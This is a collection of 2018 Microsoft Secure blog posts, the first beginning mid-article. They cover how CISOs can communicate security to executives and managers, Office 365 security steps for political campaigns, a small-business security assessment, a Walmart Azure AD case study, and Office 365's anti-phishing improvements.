Using the same proven communication strategies to frame up security for business managers that we shared in the last blog, I'll show how you can apply those techniques to your conversations with executives and the C-Suite. Here's a hint: it all starts with the same underlying concept. No matter how high up in the organization she or he is, or how many people or responsibilities they have, your CIO is human, and so is your entire executive team. If you apply communication strategies that have been proven to work outside of cybersecurity, you can get your CIO and other executives more involved in security decision-making.

  • Feel: One thing that my conversation with the CIO demonstrates is the role that emotions play. The original policy to lock down all ecommerce on company devices and networks was driven by fear. Emotions are understandable, but they can also drive us to make rash decisions that we regret later. You can defuse an emotional situation by listening first. Try to understand where the CIO is coming from before you respond to his or her emotions. And above all, resist the temptation to scare an executive into taking security seriously by throwing scary statistics at them. That will only backfire.
  • Focus: CIOs and other executives are bombarded with decisions and issues all day long. It can be challenging to get them to focus on your agenda, but it's important if you want them to make smart security decisions. Set a meeting for a quiet period in their calendar or have a planning meeting set aside where it's agreed cell phones are off and brains are fully engaged. It's amazing what we can accomplish when we're not distracted.
  • Slow down: This goes hand in hand with Focus. The timing of and the amount of time for the discussion can also dictate the outcome. Allow space for questions and thoughtfulness. I've led Executive Introduction to Threat Modeling classes using implantable medical devices (IMDs) and fitness wearables as examples. In the first five minutes most of the class leans toward thinking the IMDs pose all the risk. But once they've taken the time to threat model both devices for themselves, they realize fitness wearables can be non-trivial threat vectors.
  • Simplify: Tailor your conversation for your audience. Tech speak may resonate with a CIO, but other executives will get lost if you get too techy. And no matter who you are speaking with, it's important that you speak in the language of business goals. How do your proposals and ideas best advance the goals of the executive that you are speaking with? And don't be afraid to engage the C-Suite in the activity of simplifying. If you ask the executives to think about how they'd explain ransomware or phishing to a very non-tech-savvy relative, they'll be able to connect more closely with the technical risks and also, hopefully, have a bit more empathy for you, the security geek, who's tasked with explaining tough security risks to them.
  • Spark: Tap into the incredible power of why. Why does your company do what it does? Make sure your security pitch aligns to this overall mission. Explain how your security efforts get the company closer to achieving its vision. Go back to your corporate vision statement and ask the execs if a proposed policy or control ultimately supports that mission. When a CEO participating in an incident response simulation opts to report an incident, not because it's legally required, but because "our corporate values mean radical transparency with our customers," you've sparked real connection between technical risk management and the business.

Experience is one of our great teachers. As the CIO in this story learned, some security rules look good until they get in the way of executives. And some security measures may seem costly and unnecessary, but when weighed against massive reputational damage or material financial loss, those investments calibrate as frugal and wise. You don’t have to make your CIO a cyber ninja to have a productive conversation. To effect real change, engage executives as human beings in the cybersecurity policy and strategy decision-making process.

The post CISO series: Partnering with the C-Suite on cybersecurity appeared first on Microsoft Secure.


Top 10 security steps in Microsoft 365 that political campaigns can take today

October 23rd, 2018 No comments

The increasing frequency of cyberattacks makes clear that more must be done to protect key democratic institutions from cyber-enabled interference. With just a few weeks left before the U.S. midterm elections and early voting under way, campaigns must stay vigilant in protecting against cyberattacks on their online collaboration tools, including email. Microsoft recommends taking action today to protect against phishing, malware, account compromise, and other threats; see Top 10 ways to secure Office 365 and Microsoft 365 Business plans from cyberthreats. These recommendations are tailored for small to mid-sized political campaigns and election-focused stakeholders using Office 365 or Microsoft 365. Any organization, especially those without full-time IT security staff, can benefit from taking these actions.

This guidance provides step-by-step instructions for using 10 high-impact security capabilities. These actions help you implement many of the best practices recommended in the Cybersecurity Campaign Playbook, created by the Defending Digital Democracy program at Harvard Kennedy School's Belfer Center for Science and International Affairs.

Top 10 cybersecurity recommendations:

  1. Set up two-step verification for all staff.
  2. Train campaign staff to quickly identify phishing attacks.
  3. Use dedicated accounts for administration.
  4. Raise the level of malware protection in mail.
  5. Protect against ransomware.
  6. Prevent emails auto-forwarding outside of the campaign.
  7. Increase encryption for sensitive emails.
  8. Protect your email from phishing attacks.
  9. Protect against malicious attachments in email.
  10. Protect against phishing attacks that include malicious website links in email or other files.

Read Top 10 ways to secure Office 365 and Microsoft 365 Business plans from cyberthreats for details on how to implement each action.

These recommendations are provided as part of Microsoft's ongoing commitment to the Defending Democracy Program. Qualifying organizations using Office 365 can also take advantage of Microsoft AccountGuard for additional protection, to leverage Microsoft's state-of-the-art threat detection and notification in case of targeted nation-state cyberattacks.

The post Top 10 security steps in Microsoft 365 that political campaigns can take today appeared first on Microsoft Secure.


Take steps to secure your business and users with our security business assessment

Businesses can no longer afford to take cybersecurity for granted. You can't read the news without seeing a splashy headline about a successful hack or data breach at a well-known company. However, this isn't just a problem for large enterprises; increasingly, small and medium-sized businesses are becoming targets of cybercriminals and need to take steps to improve their security.

Yet it can be hard for small and medium-sized businesses to right size a security strategy for their unique business. We believe a good place to start is by answering these four questions:

  • How secure are your users and accounts?
  • How protected are you from threats?
  • How safe is your data?
  • How effectively are you managing security?

The Microsoft Security Assessment can help you discover where you are vulnerable and provide personalized recommendations to improve your security posture. Keep reading for a peek at some of our key learnings from the assessment.

How secure are your users and accounts?

In today's modern workplace, employees work from anywhere on any number of devices. This has been great for personal productivity, but has also created more possible points of entry for hackers to break in. One of the biggest challenges is to make it easy for your users to connect to the resources they need, from the devices they prefer, while balancing security for your company and its assets.

There are many ways to protect your accounts, but make sure you include Multi-Factor Authentication (MFA), as no password is foolproof. MFA is safer because it requires two forms of authentication to gain access. For example, you can require that users sign in with a password plus either a code generated by an application or a biometric, like fingerprints or facial recognition. Products such as Microsoft 365 Business make it easy to enable MFA for your email, file storage, and productivity apps, adding another layer of defense to your organization’s assets.

How protected are you from threats?

The latest figures show that cybercriminals are increasingly targeting small and medium-sized business alongside big businesses. Forty-one percent of businesses with fewer than 250 employees reported an attack in the last 12 months. Fortunately, there are practical things you can do to reduce your vulnerability, and every step makes a huge difference.

Two recommendations that are low cost, or even free, include maintaining software upgrade cycles and conducting regular employee training. If you don't require that employees keep software updated and patched, consider starting. Whether it is for the operating system, servers, devices, applications, plug-ins, or any other technology, updates will reduce security vulnerabilities. You can also increase your security posture through regular employee security training. The onboarding process is a good opportunity to share cybersecurity practices, but don't stop there. Consider putting a regular security training program in place to remind employees how to detect and report suspicious links, attachments, and emails; avoid malicious websites; and download only verified applications.

How safe is your data?

One of your most valuable assets is your data. Data includes everything from a private document, to personally identifiable information, to sales projections, and more. In all cases, it will be damaging to individuals and your business if it gets into the wrong hands. You need to protect sensitive data where it lives and while it travels.

One way to safeguard critical documents is with encrypted access. Document-level protection helps guarantee that only authorized users can read and inspect privileged data, even when it is sent outside of your organization. This level of protection is available in certain products, such as Microsoft 365 Business, which also includes the ability to notify and educate users when they are working with sensitive data.

How effectively are you managing security?

A strong defense is more than just a set of tools and practices. You need a thoughtful approach to how you manage security. Effective security management will give you visibility into vulnerabilities across all your resources, and it will encourage consistency across your security policies. With a strategic approach you will better understand your current risks and be able to identify opportunities to increase your protection.

A critical component of security management is periodic reviews of user access to data, devices, and networks. People, roles, and responsibilities change over time, which is why it's good to know what roles have access to what resources. You can use this review to make sure that users have the right level of access, for the right time period, based on their role. For example, someone in HR might need to access the financial services database during a specific project. You can also make sure those that have left your organization or changed role have been de-provisioned, and you can investigate any suspicious activity that is detected.

Evaluate how well your business is protected

Unfortunately, it is not just the big brands that must combat cyberattacks. Small and medium-sized businesses are also at risk. We've given you a sampling of our recommended security best practices, but there is still more you may want to consider. The security assessment can help you evaluate holistically how strong your current defenses are and provide specific actionable recommendations that you can put in place to increase your confidence and reduce your vulnerabilities.

Take the Microsoft Security Assessment and bookmark the Microsoft Secure blog to read up on the latest steps or deployment tips to keep your business safer.


[1] SMB ITDM Omnibus Survey

The post Take steps to secure your business and users with our security business assessment appeared first on Microsoft Secure.


Voice of the Customer: Walmart embraces the cloud with Azure Active Directory

October 22nd, 2018 No comments

Todays post was written by Sue Bohn, partner director of Program Management and Ben Byford and Gerald Corson, senior directors of Identity and Access Management at Walmart.


I'm Sue Bohn, partner director of Program Management at Microsoft. I'm an insatiable, lifelong learner and I lead the Customer & Partner Success team for the Identity Division. I'm jazzed to introduce the Voice of the Customer blog series. In this series, the best of our customers will present their deployment stories to help you learn how you can get the most out of Azure Active Directory (Azure AD). Today we'll hear from Walmart. I love the convenience of Walmart; where else can you buy tires, socks, and orange juice in one trip?

Walmart teamed up with Microsoft to digitally transform its operations, empower associates with easy-to-use technology, and make shopping faster and easier for millions of customers around the world. But this strategic partnership didn't just happen overnight. In the beginning, Walmart's cybersecurity team was skeptical about the security of the public cloud and Azure AD. Ben Byford and Gerald Corson, senior directors of Identity and Access Management at Walmart, share their team's journey working with Microsoft to embrace the cloud with Azure AD:

Working closely with our Microsoft account team convinced us we could safely write back to on-premises and enable password hash synch

In the beginning, we were willing to feed to the cloud but at that time not comfortable allowing the syncing of passwords to the cloud or write back to on-premises from cloud. We were skeptical of the security controls. We involved Microsoft in the strategy and planning phases of our initiatives and made slow but steady progress. As we worked with the Microsoft team, representatives were eager to get any and all feedback and to provide it to their product groups. This led to our critical Azure AD enhancement requests being received and solutions being delivered. When we ran into bugs, we were able to troubleshoot issues with the very people who wrote the application code. Our Microsoft account team was right there with us, in the trenches, and they were committed to making sure we were confident in Azure AD's capabilities. Over time, as we learned more about Azure AD and the new security features we were enabling, our trust in Microsoft's Azure AD security capabilities grew and many of our security concerns were alleviated.

Given our scale, validating and verifying the security capabilities of Azure AD was key to empowering our users while still protecting the enterprise. Walmart currently has over 2.5 million Azure AD users enrolled, and with that many users we need very granular controls to adequately protect our assets. The entire team, including Microsoft, rolled up our sleeves to figure out how to make it work, and together we've enabled several features that let us apply custom security policies. Azure Information Protection (AIP), an amazing solution that is only possible with Azure AD, allows us to classify and label documents and emails to better protect our data. Azure AD Privileged Identity Management (PIM) gives us more visibility and control over admins. Azure AD dynamic groups let us automatically enable app access to our users. This is a huge time saver in an environment with over half a million groups. With all of the work we did with Microsoft and our internal security team, we were able to turn on the two features we previously did not think we would be able to: password hash synch and write back from cloud to on-premises. This was critical to our journey as we had never allowed a cloud solution to feed back into our core environment in this manner.

Driving down help desk calls with self-service password reset

One example that shows how much we trust the security of Azure AD and the cloud is self-service password reset (SSPR). The biggest driver of help desk calls at Walmart is people who get locked out of their accounts because of a forgotten password. It wastes a tremendous amount of our help desk's time and frustrates associates who lose time sitting on the phone. We believed that letting users reset their passwords and unlock their accounts without help desk involvement would go a long way and improve productivity, but we had always been nervous about giving people who weren't on Walmart PCs that kind of access. Another hurdle was ensuring that our hourly associates were only able to utilize this service while they were clocked in for work. Microsoft helped us solve this with the implementation of custom controls.

Our Microsoft team supported us the entire way, and we're proud to say that SSPR is being rolled out. When we started this journey, we would never have believed that we would allow people to reset their passwords from a public interface, but here we are, and the user experience is great!

Engage Microsoft early

If there is one thing we would have done differently, it would be to engage Microsoft at a deeper level earlier on in the process. Our public cloud adoption didn't really take off until we brought them in and spent time with their backend product engineering teams. Microsoft's commitment to improving security and the cloud is clear. Their work to safeguard data has continuously improved, and as we work more closely with them, they also continue to incorporate our feedback into future feature releases. It is this relationship that has allowed us to securely implement Azure AD at our scale.

We look forward to sharing our next big success: implementation of Azure AD B2B.

Voice of the Customer: looking ahead

Many thanks to Ben and Gerald for sharing their journey from on-premises to Azure AD. Our customers have told us how valuable it is to learn from their peers. The Voice of the Customer blog series is designed to share our customers' security and implementation insights more broadly. Bookmark the Microsoft Secure blog so you don't miss part 2 in this series. Our next customer will speak to how Azure AD and implementing cloud Identity and Access Management makes them more secure.

The post Voice of the Customer: Walmart embraces the cloud with Azure Active Directory appeared first on Microsoft Secure.


CISO series: Building a security-minded culture starts with talking to business managers

October 18th, 2018 No comments

Cybersecurity is everyone's business; protecting the company and its users against data leaks is no longer just the responsibility of IT and security operations. Everyone from the board to Firstline Workers has an important role to play. A culture that encourages individuals to believe they have a part in defending the company against malicious behavior requires that each person is aware of the day-to-day risks and knows how their actions and choices can mitigate, or increase, those risks. This is why we will be writing a new series of blog posts for senior security experts and executives, called the CISO series, to help further discussions from within the organization to the boardroom to the customer, and to help establish that security culture and mindset.

If you are like many of your peers, one of the initiatives that you've put in place to create a culture where everyone in your organization takes security seriously is a required, annual security training for all employees. And, hopefully, it seems to be working. Feedback from security training indicates that employees have a better understanding of their role in cybersecurity. Even more important, many of your users have begun to take steps to improve their security posture, such as reporting suspicious emails rather than clicking the links.

There's just one problem. Today, one of your security operations managers brings to your attention a report showing that the sales division consistently gets low scores on the training. The sales team promotes your business products throughout the world, in Asia, Europe, North America, and South America, often accessing company data from overseas via unsecured wireless. If anyone needs to ace this training, it's this team. You're tempted to get on the phone immediately and provide the VP of Sales a litany of scary statistics that prove how critical this training is. But, fortunately, you stop yourself. If you have any hope of increasing compliance, you need this manager engaged in the solution and on your side. What's more, if you handle the discussion properly, the VP of Sales could give you insights to help you craft a program that his team will embrace more enthusiastically.

Turn business managers into security evangelists

If you have any hope of turning the VP of Sales into an advocate, you need to frame security in the language of the business by quantifying business impacts. You've heard this before, but what does it mean in practice? What if we start with an even more basic truth: the most important thing to remember about the VP of Sales is that he/she is a human being. And so is everyone on the team. In other words, tried and true communication strategies that have been proven to work outside of cybersecurity also work with humans who happen to be business managers.

Five communication strategies proven to work

Take a look at the following communication strategies and see how they can be customized for your conversation with your own VP of Sales:

  • Feel: You probably have a list of statistics that could scare the VP of Sales into compliance, but they also might backfire, causing them to shut down. A more effective approach is to dial down the emotional undercurrent of the conversation and start by listening. You may think you know why the sales team has low training compliance; then again, maybe you don't. The very first step is understanding their side. Don't move on to solutions until you both are confident that you understand why the team has not prioritized the training.
  • Focus: Everyone is trying to do 10 things at once, but continuous partial attention means we can't focus on what's important. Once you understand why the sales team has not been scoring high marks on the training, you can engage the business manager (VP of Sales) in a conversation that is laser-focused on their team's needs, making it more likely that you both will put your full attention on the issue.
  • Slow down: Time limits make us think less strategically. If you need time to gather the data that will support your case, consider calling for a pause so you can do your due diligence. And make sure you time your conversation with the VP during a quiet time in the quarter. Year end is a hectic time for sales, and the worst time to try and squeeze in a cyber awareness discussion.
  • Simplify: Remember that tech speak is not the right language for this audience. Give some thought to how your security training supports the goals of the sales team. Access to reliable customer data like escalations and licenses is critical to a successful mobile sales force. Cybersecurity is about ensuring the sales team has confidential access to that data wherever and whenever they need it. The VP will more likely understand your priorities if they understand how they're aligned to their own priorities.
  • Spark: Tap into the incredible power of "why" by explaining why your company needs security compliance. Make sure your security pitch and training align to this overall mission. Explain how your security efforts get the company closer to achieving its vision.

Creating a culture where everyone takes accountability for defending the enterprise against cybercrime will require that we get everyone engaged, from the board and C-Suite executives to business managers and Firstline Workers. As you embark on this effort, keep in mind that how you say it is as important as what you say. You can create a path to success if you understand the motivations and goals of the business, and if you don't forget one core truth: we're all human. Please stay tuned for our next blog in this series, where I will give you tips for engaging your C-Suite executive team in the cybersecurity conversation.

The post CISO series: Building a security-minded culture starts with talking to business managers appeared first on Microsoft Secure.


How Office 365 learned to reel in phish

October 17th, 2018 No comments

Today’s post was coauthored by Debraj Ghosh, Senior Product Marketing Manager, and Jason Rogers, Principal Group Program Manager at Microsoft.

We recently reported how we measure catch rates of malicious emails for Office 365 Exchange Online Protection (EOP) (available with any Office 365 subscription) and Advanced Threat Protection (ATP) (available as a standalone service or with Office 365 E5).

Today, we're sharing the results from the enhancements we made to anti-phish capabilities for Office 365 to address impersonation, spoof, and phish content, as well as internal phish emails sent from compromised accounts. Over the last year, Microsoft's threat analysts observed threat actors pivoting from malware to sophisticated, often targeted phishing campaigns. The scale of these attacks and how quickly users click through on malicious links is shown in Figure 1.

Figure 1. Phish email statistics from Office 365 from January 2018 to September 2018.

Understanding the phish landscape

To develop solutions mitigating these modern phishing campaigns, our engineers rigorously analyzed phish emails in Office 365, uncovering a general pattern of phish campaigns following the path shown in Figure 2.

Figure 2. Phish email campaign pathway from initial reconnaissance to data exfiltration.

Additionally, since Office 365 is one of the world's largest email service providers, Microsoft gains visibility and experience across most, if not all, types of cyber threats. Every day, Microsoft analyzes 6.5 trillion signals, and each month we analyze 400 billion emails, while detonating 1 billion items in our sandbox. This telemetry helps us understand the full spectrum of phish attacks and the sophisticated and varied methods used by attackers, summarized in Figure 3. With this understanding of the phish landscape, our engineers not only designed new capabilities, but also enhanced existing capabilities to address the phishing emails being launched at customers.

Figure 3. Phish emails attack spectrum and variety of attack methods.

Understanding the situation

When we began our journey of enhancing our anti-phish capabilities, we admittedly were not best of breed at mitigating phish. As we alluded to previously, transparency with customers is a core priority at Microsoft. Figure 4 shows the number of phish emails that Microsoft (Office 365) missed in comparison to several other vendors also protecting email for customers within Office 365.

From November 2017 to January 2018, you can see that Office 365 (orange bar in Figure 4) was not the best solution at phish catch. (We previously discussed how we measure phish catch.) The values are based on normalized email volume. As the inset plot shows, the scale of mail volume in Office 365 far exceeds the mail volume of third-party vendors. Fundamentally, this scale is one of our differentiators and strengths, as it offers us much greater depth and breadth into the threat landscape.

Figure 4. Normalized phish email miss from November 2017 to January 2018 in Office 365 email traffic. Inset shows actual mail flow volume.

Solving the problem with our technology, operations, and partnerships

Leveraging our signal from mail flow, the expertise of 3,500 in-house security professionals, and our annual $1 billion investment in cybersecurity, we strategically addressed the growing wave of phishing campaigns. Our engineers determined four categories of phish emails and designed capabilities addressing each type. Figure 5 summarizes the enhancements made to the anti-phish capabilities in Office 365.

Figure 5. Phish email categories and anti-phish enhancements made in Office 365 to address the categories.

Details on all the anti-phish updates for Office 365 are available in the following posts:

While the enhancements are interesting, ultimately, catch rate is the parameter that counts, and it is important to remember that no solution can ever stop all threats. Sometimes misses occur, and the most effective solution will miss the least. To this end, we are very excited to share our phish miss rate from May 1, 2018 to September 16, 2018. As you can see in Figure 6, today, when compared to the same set of vendors that we compared ourselves to from November to January, we exhibit the lowest miss rate of phish emails in Office 365. Figure 6 is the culmination of the incredible focus, drive, and expertise of Microsoft researchers and engineers working together to push the boundaries of threat research, machine learning, and algorithm development, which together provide customers the most effective protection against phish emails available for Office 365 today.

Figure 6. Normalized Phish Email Miss Rate in Office 365 from May 1, 2018 to September 16, 2018. Inset is a blowup of the graph from August 1, 2018 to September 16, 2018.

While the graph in Figure 6 is illuminating, we also want to share statistics from Office 365 EOP/ATP related to phish mitigation. Figure 7 summarizes the impact these new anti-phish capabilities across EOP/ATP have had in helping secure Office 365 users, and further showcases our depth and scale into the threat landscape. For those unfamiliar with Office 365 ATP, Safe Links provides time-of-click protection from malicious links in email: the click triggers several different protection technologies, including URL reputation checks, machine learning capabilities, and link detonation as needed. Recently, Safe Links expanded its capabilities to intra-org emails, making Office 365 ATP the only service to offer this type of protection while ensuring the internal emails remain within the compliance boundary of Office 365. We hope you agree that the anti-phish capabilities have evolved at a remarkable pace and with amazing results.

Figure 7. The impact to end users from the enhanced anti-phish capabilities in Office 365.

Learn more

We hope this post provides a good overview of how we are helping customers with modern phishing campaigns. Please be sure to check out the Ignite session, Secure enterprise productivity with Office 365 threat protection services including EOP, ATP, and Threat Intelligence, where we give more details. Your feedback enables us to continue improving and adding features that will continue to make ATP the premier advanced security service for Office 365. If you have not tried Office 365 ATP for your organization yet, you should begin a free Office 365 E5 trial today and start securing your organization from the modern threat landscape.

The post How Office 365 learned to reel in phish appeared first on Microsoft Secure.
